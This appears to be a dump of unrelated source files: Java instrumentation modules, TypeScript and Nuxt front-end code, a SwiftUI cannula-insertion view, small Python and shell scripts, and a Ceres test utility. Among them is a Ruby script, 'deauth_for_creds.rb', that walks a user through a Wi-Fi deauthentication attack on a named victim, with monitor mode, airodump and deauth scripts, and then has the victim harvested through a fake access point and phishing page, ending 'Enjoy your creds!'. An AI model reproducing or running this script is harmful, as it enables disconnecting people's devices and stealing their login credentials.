public void generateFeatureMap() {
featureMap = new HashMap<>();
if (features != null) {
for (Feature feature : features) {
featureMap.put(feature.getName(), feature);
}
}
}
/**
* Gets the {@link Map} of features for lookup use
* @return
*/
public Map<String, Feature> getFeatureMap() {
return featureMap;
}
}
|
/**
* Copyright 2021 <NAME>, Co.Ltd
* Email: <EMAIL>
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.shulie.instrument.module.pradar.core;
import javax.annotation.Resource;
import com.pamirs.pradar.Pradar;
import com.pamirs.pradar.PradarService;
import com.pamirs.pradar.PradarSwitcher;
import com.pamirs.pradar.common.ClassUtils;
import com.pamirs.pradar.debug.DebugHelper;
import com.pamirs.pradar.internal.GlobalConfigService;
import com.pamirs.pradar.internal.PradarInternalService;
import com.pamirs.pradar.pressurement.agent.shared.exit.ArbiterHttpExit;
import com.pamirs.pradar.pressurement.agent.shared.service.EventRouter;
import com.pamirs.pradar.pressurement.agent.shared.service.GlobalConfig;
import com.pamirs.pradar.pressurement.agent.shared.util.PradarSpringUtil;
import com.pamirs.pradar.pressurement.agent.shared.util.TbScheduleUtil;
import com.pamirs.pradar.pressurement.datasource.SqlParser;
import com.pamirs.pradar.pressurement.datasource.util.SqlMetadataParser;
import com.pamirs.pradar.upload.uploader.AgentOnlineUploader;
import com.pamirs.pradar.utils.MonitorCollector;
import com.shulie.instrument.module.pradar.core.handler.DefaultExceptionHandler;
import com.shulie.instrument.module.pradar.core.service.DefaultGlobalConfigService;
import com.shulie.instrument.module.pradar.core.service.DefaultPradarInternalService;
import com.shulie.instrument.module.pradar.core.service.DefaultPradarService;
import com.shulie.instrument.simulator.api.ExtensionModule;
import com.shulie.instrument.simulator.api.ModuleInfo;
import com.shulie.instrument.simulator.api.ModuleLifecycleAdapter;
import com.shulie.instrument.simulator.api.resource.ModuleCommandInvoker;
import com.shulie.instrument.simulator.message.Messager;
import org.kohsuke.MetaInfServices;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* 用于公共依赖的模块
* 需要在module.config文件中指定要导出的包列表, 给其他的模块依赖
*
* @author xiaobin.zfb|<EMAIL>
* @since 2020/10/1 12:22 上午
*/
@MetaInfServices(ExtensionModule.class)
@ModuleInfo(id = "pradar-core", version = "1.0.0", author = "<EMAIL>",
description = "pradar core 模式,提供链路追踪 trace 埋点以及压测标等服务")
public class PradarCoreModule extends ModuleLifecycleAdapter implements ExtensionModule {
private final static Logger logger = LoggerFactory.getLogger(PradarCoreModule.class);
private MonitorCollector monitorCollector;
@Resource
private ModuleCommandInvoker moduleCommandInvoker;
@Override
public void onActive() throws Throwable {
//将simulator home路径和plugin相关的配置全部导入到system property中
String home = simulatorConfig.getSimulatorHome();
if (home != null) {
System.setProperty("simulator.home", home);
}
Integer requestSize = simulatorConfig.getIntProperty("plugin.request.size");
if (requestSize != null) {
System.setProperty("plugin.request.size", String.valueOf(requestSize));
}
Integer responseSize = simulatorConfig.getIntProperty("plugin.response.size");
if (responseSize != null) {
System.setProperty("plugin.response.size", String.valueOf(responseSize));
}
Boolean requestOn = simulatorConfig.getBooleanProperty("plugin.request.on");
if (requestOn != null) {
System.setProperty("plugin.request.on", String.valueOf(requestOn));
}
Boolean responseOn = simulatorConfig.getBooleanProperty("plugin.response.on");
if (responseOn != null) {
System.setProperty("plugin.response.on", String.valueOf(responseOn));
}
PradarService.registerPradarService(new DefaultPradarService());
PradarInternalService.registerService(new DefaultPradarInternalService());
DebugHelper.registerModuleCommandInvoker(moduleCommandInvoker);
GlobalConfigService.registerService(new DefaultGlobalConfigService());
/**
* 注册自定义的异常处理器
*/
Messager.registerExceptionHandler(simulatorConfig.getNamespace(), new DefaultExceptionHandler());
monitorCollector = MonitorCollector.getInstance();
monitorCollector.start();
}
@Override
public void onFrozen() throws Throwable {
EventRouter.router().shutdown();
AgentOnlineUploader.getInstance().shutdown();
if (monitorCollector != null) {
monitorCollector.stop();
}
Pradar.shutdown();
}
@Override
public void onUnload() throws Throwable {
PradarService.registerPradarService(null);
PradarInternalService.registerService(null);
GlobalConfigService.registerService(null);
GlobalConfig.getInstance().release();
PradarSwitcher.destroy();
ArbiterHttpExit.release();
SqlParser.release();
ClassUtils.release();
PradarSpringUtil.release();
TbScheduleUtil.release();
SqlMetadataParser.clear();
}
}
|
<filename>deauth_for_creds.rb
#!/bin/ruby
print("Please open Ghost-Phisher on your Kali machine.
")
print("Before continuing, I will need to know the name of the interface that you plan on using for this
attack. Name of interface:
")
interface = gets.chomp
system("sed -i 's/interface/#{interface}/g' airodump.sh")
system("chmod +x airodump.sh")
system("bash airodump.sh")
print("What is the name of the BSSID that your victim
is connected to:
")
bssid = gets.chomp
system("ifconfig #{interface} down")
system("iwconfig #{interface} mode monitor")
system("ifconfig #{interface} up")
system("sed -i 's/bssid1/#{bssid}/g' airodump_mac.sh")
system("sed -i 's/interface/#{interface}/g' airodump_mac.sh")
system("ifconfig #{interface} down")
system("iwconfig #{interface} mode managed")
system("ifconfig #{interface} up")
system("chmod +x airodump_mac.sh")
system("bash airodump_mac.sh")
print("What is the MAC address of your victim:
")
victim_mac = gets.chomp
print("WARNING: DO NOT CLOSE THE TERMINAL ABOUT TO BE OPENED!!!")
system("sed -i 's/bssid/#{bssid}/g' deauth.sh")
system("sed -i 's/victim_mac/#{victim_mac}/g' deauth.sh")
system("sed -i 's/interface/#{interface}/g' deauth.sh")
system("chmod +x deauth.sh")
system("bash deauth.sh")
print("In Ghost-Phisher, please create an access point, using
a wireless card other than the #{interface}.
")
print("Go to the 'Fake HTTP Server' tab and click on 'Select
Webpage,' select one of the HTML files in the 'Deauth_for_Creds'
folder.")
print("Go to the 'Harvested Credentials' tab and look for your
victim's information.")
print("Kill the terminal running the deauth attack.")
print("Enjoy your creds!")
|
<reponame>blu-world/shengji
import * as React from "react";
import {
ITrump,
ITrickUnit,
IBid,
IHands,
IPlayer,
IUnitLike,
ITrickFormat,
BidPolicy,
BidReinforcementPolicy,
IDeck,
ITrick,
TrickDrawPolicy,
IGameScoringParameters,
JokerBidPolicy,
ITractorRequirements,
} from "./types";
interface Context {
findViablePlays: (
trump: ITrump,
tractorRequirements: ITractorRequirements,
cards: string[]
) => IFoundViablePlay[];
findValidBids: (req: IFindValidBidsRequest) => IBid[];
sortAndGroupCards: (
req: ISortAndGroupCardsRequest
) => ISortedAndGroupedCards[];
decomposeTrickFormat: (
req: IDecomposeTrickFormatRequest
) => IDecomposedTrickFormat[];
canPlayCards: (req: ICanPlayCardsRequest) => boolean;
explainScoring: (req: IExplainScoringRequest) => IExplainScoringResponse;
nextThresholdReachable: (req: INextThresholdReachableRequest) => boolean;
computeScore: (req: IComputeScoreRequest) => IComputeScoreResponse;
computeDeckLen: (req: IDeck[]) => number;
decodeWireFormat: (req: any) => any;
}
export interface IFoundViablePlay {
grouping: ITrickUnit[];
description: string;
}
interface IFindValidBidsRequest {
id: number;
bids: IBid[];
hands: IHands;
players: IPlayer[];
landlord: number | null;
epoch: number;
bid_policy: BidPolicy;
bid_reinforcement_policy: BidReinforcementPolicy;
joker_bid_policy: JokerBidPolicy;
num_decks: number;
}
interface ISortAndGroupCardsRequest {
trump: ITrump | null;
cards: string[];
}
export interface ISortedAndGroupedCards {
suit: string;
cards: string[];
}
interface IDecomposedTrickFormat {
description: string;
format: IUnitLike[];
playable: string[];
}
interface IDecomposeTrickFormatRequest {
trick_format: ITrickFormat;
hands: IHands;
player_id: number;
trick_draw_policy: TrickDrawPolicy;
}
interface ICanPlayCardsRequest {
trick: ITrick;
id: number;
hands: IHands;
cards: string[];
trick_draw_policy: TrickDrawPolicy;
}
interface IExplainScoringRequest {
decks: IDeck[];
params: IGameScoringParameters;
smaller_landlord_team_size: boolean;
}
interface INextThresholdReachableRequest {
decks: IDeck[];
params: IGameScoringParameters;
non_landlord_points: number;
observed_points: number;
}
export interface IScoreSegment {
point_threshold: number;
results: IGameScoreResult;
}
interface IGameScoreResult {
landlord_won: boolean;
landlord_bonus: boolean;
landlord_delta: number;
non_landlord_delta: number;
}
interface IComputeScoreRequest {
decks: IDeck[];
params: IGameScoringParameters;
smaller_landlord_team_size: boolean;
non_landlord_points: number;
}
interface IComputeScoreResponse {
score: IGameScoreResult;
next_threshold: number;
}
interface IExplainScoringResponse {
results: IScoreSegment[];
step_size: number;
total_points: number;
}
export const WasmContext = React.createContext<Context>({
findViablePlays: (_, __) => [],
findValidBids: (_) => [],
sortAndGroupCards: (_) => [],
decomposeTrickFormat: (_) => [],
canPlayCards: (_) => false,
explainScoring: (_) => ({ results: [], step_size: 0, total_points: 0 }),
nextThresholdReachable: (_) => true,
computeScore: (_) => ({
score: {
landlord_won: true,
landlord_bonus: false,
landlord_delta: 0,
non_landlord_delta: 0,
},
next_threshold: 0,
}),
computeDeckLen: (_) => 0,
decodeWireFormat: (_) => {},
});
export default WasmContext;
|
export const actions = {
async nuxtServerInit({ commit }, { $content }) {
try {
// Add Druxt modules to Vuex store.
const modulesIndex = await $content("api/README").only("toc").fetch()
const modules = await Promise.all(modulesIndex.toc
.filter((o) => o.id !== 'druxt')
.map((o) =>
$content(`modules/${o.id.split("-")[1]}/README`)
.only(["description", "dir", "title"])
.fetch()
)
)
commit("setModules", modules);
// Add Modules menu children to the vuex store.
const moduleChildren = modules
.map((o) => ({
component: "NuxtLink",
text: o.title,
props: { to: o.dir },
}));
commit("addMenuChildren", { children: moduleChildren, parent: "/modules" });
// Add Guide menu children to the vuex store.
const guideIndex = await $content("guide")
.sortBy("weight")
.only(["path", "title", "weight"])
.fetch();
const guideChildren = guideIndex.map((o) => ({
component: "NuxtLink",
text: o.title,
props: { to: o.path.replace("/README", "") },
}));
commit("addMenuChildren", { children: guideChildren, parent: "/guide" });
// Add API menu children to the vuex store.
const apiIndex = await $content("api").only(["path", "title"]).fetch();
const apiChildren = apiIndex.map((o) => ({
component: "NuxtLink",
text: o.title,
props: { to: o.path.replace("/README", "") },
}));
commit("addMenuChildren", { children: apiChildren, parent: "/api" });
} catch (err) {
console.log(err)
}
}
}
|
import SwiftUI
import LoopKitUI
struct InsertCannulaView: View {
@ObservedObject var viewModel: InsertCannulaViewModel
@Environment(\.verticalSizeClass) var verticalSizeClass
@State private var cancelModalIsPresented: Bool = false
var body: some View {
VStack {
// Other view components for guiding the user through cannula insertion process
Button(action: {
self.cancelModalIsPresented = true
}) {
Text("Confirm Cannula Insertion")
}
}
.sheet(isPresented: $cancelModalIsPresented) {
ConfirmationModalView(isPresented: self.$cancelModalIsPresented)
}
}
}
struct ConfirmationModalView: View {
@Binding var isPresented: Bool
var body: some View {
VStack {
Text("Are you sure you want to insert the cannula?")
HStack {
Button("Confirm") {
// Perform action to confirm cannula insertion
self.isPresented = false
}
Button("Cancel") {
// Perform action to cancel cannula insertion
self.isPresented = false
}
}
}
}
} |
# Generating sparse matrix
m = 2
n = 2
# Creating an empty list
sparseMatrix = [[0 for i in range(n)] for j in range(m)]
# Creating the sparse matrix by multiplying row and column outline
for i in range(m):
for j in range(n):
sparseMatrix[i][j] = i * j
# Printing the sparse matrix
for i in range(m):
for j in range(n):
print (sparseMatrix[i][j],end = " ")
print () |
#!/bin/sh
echo -n "Queued: "
./check-queue.pl $1
echo -n "Finished: "
../s3cmd-1.0.0/s3cmd ls s3://$1/ | wc -l
|
// Ceres Solver - A fast non-linear least squares minimizer
// Copyright 2015 Google Inc. All rights reserved.
// http://ceres-solver.org/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
// * Neither the name of Google Inc. nor the names of its contributors may be
// used to endorse or promote products derived from this software without
// specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
// Author: <EMAIL> (<NAME>)
// <EMAIL> (<NAME>)
#include "ceres/evaluator_test_utils.h"
#include "ceres/internal/eigen.h"
#include "gtest/gtest.h"
namespace ceres {
namespace internal {
void CompareEvaluations(int expected_num_rows,
int expected_num_cols,
double expected_cost,
const double* expected_residuals,
const double* expected_gradient,
const double* expected_jacobian,
const double actual_cost,
const double* actual_residuals,
const double* actual_gradient,
const double* actual_jacobian) {
EXPECT_EQ(expected_cost, actual_cost);
if (expected_residuals != nullptr) {
ConstVectorRef expected_residuals_vector(expected_residuals,
expected_num_rows);
ConstVectorRef actual_residuals_vector(actual_residuals, expected_num_rows);
EXPECT_TRUE(
(actual_residuals_vector.array() == expected_residuals_vector.array())
.all())
<< "Actual:\n"
<< actual_residuals_vector << "\nExpected:\n"
<< expected_residuals_vector;
}
if (expected_gradient != nullptr) {
ConstVectorRef expected_gradient_vector(expected_gradient,
expected_num_cols);
ConstVectorRef actual_gradient_vector(actual_gradient, expected_num_cols);
EXPECT_TRUE(
(actual_gradient_vector.array() == expected_gradient_vector.array())
.all())
<< "Actual:\n"
<< actual_gradient_vector.transpose() << "\nExpected:\n"
<< expected_gradient_vector.transpose();
}
if (expected_jacobian != nullptr) {
ConstMatrixRef expected_jacobian_matrix(
expected_jacobian, expected_num_rows, expected_num_cols);
ConstMatrixRef actual_jacobian_matrix(
actual_jacobian, expected_num_rows, expected_num_cols);
EXPECT_TRUE(
(actual_jacobian_matrix.array() == expected_jacobian_matrix.array())
.all())
<< "Actual:\n"
<< actual_jacobian_matrix << "\nExpected:\n"
<< expected_jacobian_matrix;
}
}
} // namespace internal
} // namespace ceres
|
"""
A Python function to determine whether two given strings are anagrams of each other
"""
def check_anagram(string1, string2):
# If the strings are not of equal length, they cannot be anagrams
if len(string1) != len(string2):
return False
# Dictionary to store characters and their frequencies
dictionary = {}
# Store the frequency of the characters of the first string to the dictionary
for char in string1:
if char in dictionary:
dictionary[char] += 1
else:
dictionary[char] = 1
# Iterate over the characters in the second string
for char in string2:
# If the character is not in the dictionary, then the string cannot an anagram
if char in dictionary:
dictionary[char] -= 1
else:
return False
# Check if all the frequencies have been reduced to 0
for i in dictionary.values():
if i != 0:
return False
return True
if __name__ == '__main__':
string1 = "Stop"
string2 = "post"
print(check_anagram(string1, string2)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.